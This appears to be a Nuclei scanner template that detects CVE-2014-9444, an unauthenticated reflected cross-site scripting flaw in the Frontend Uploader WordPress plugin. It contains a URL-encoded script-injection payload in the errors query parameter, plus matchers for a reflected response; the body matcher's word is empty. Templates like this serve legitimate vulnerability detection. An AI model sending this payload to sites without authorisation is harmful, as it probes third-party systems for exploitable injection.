id: CVE-2014-9444 info: name: Frontend Uploader <= 0.9.2 - Unauthenticated Cross-Site Scripting author: daffainfo severity: medium description: The Frontend Uploader WordPress plugin prior to v.0.9.2 was affected by an unauthenticated Cross-Site Scripting security vulnerability. reference: - https://wpscan.com/vulnerability/f0739b1e-22dc-4ca6-ad83-a0e80228e3c7 - https://nvd.nist.gov/vuln/detail/CVE-2014-9444 tags: cve,cve2014,wordpress,wp-plugin,xss classification: cve-id: CVE-2014-9444 requests: - method: GET path: - "{{BaseURL}}/?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - '' part: body - type: word part: header words: - text/html - type: status status: - 200 # Enhanced by mp on 2022/02/25